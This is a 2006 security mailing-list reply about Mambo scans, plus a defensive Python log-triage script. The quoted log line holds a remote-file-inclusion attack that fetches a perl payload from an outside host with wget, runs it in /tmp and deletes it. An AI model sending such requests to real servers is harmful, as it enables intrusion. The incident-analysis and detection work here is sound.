Security Incidents mailing list archives
Re: High volume of Mambo scans
From: "George A. Theall" <theall () tifaware com>
Date: Sun, 14 May 2006 20:24:58 -0400
On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote:
> Since Thursday night I'm seeing a high volume of scans
> ...
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"

This looks like what's covered by CVE-2005-3738 and described here:

http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html

George
-- 
theall () tifaware com
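
A triage check for the request pattern in the quoted log line, as an added example that is not part of the original post: it flags access-log entries that pass a remote URL in `mosConfig_absolute_path` or name PHP superglobals in the query string. The function names, the sample lines and their addresses and host names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Common/combined log format: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# Query parameters named after PHP superglobals, e.g. GLOBALS or _REQUEST[option].
SUPERGLOBAL = re.compile(
    r'^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION))(?:\[|$)'
)

def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m["target"].partition("?")[2]
    reasons = set()
    # parse_qsl percent-decodes, so encoded variants are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "mosConfig_absolute_path" and REMOTE_URL.match(value):
            reasons.add("remote-include")
        if SUPERGLOBAL.match(name):
            reasons.add("superglobal-overwrite")
    if not reasons:
        return None
    # The status is kept so non-404 hits can be reviewed first.
    return {"ip": m["ip"], "status": int(m["status"]), "reasons": sorted(reasons)}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses and host names).
SAMPLE = [
    '192.0.2.10 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://files.example.invalid/cmd.txt? HTTP/1.0" 404 167 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/May/2006:15:30:02 -0300] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.invalid%2Fcmd.txt HTTP/1.0" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2006:15:31:40 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 404, as in the quoted line, only says the requested path did not exist on that host; entries with other status codes are the ones to check against the web root and `/tmp`.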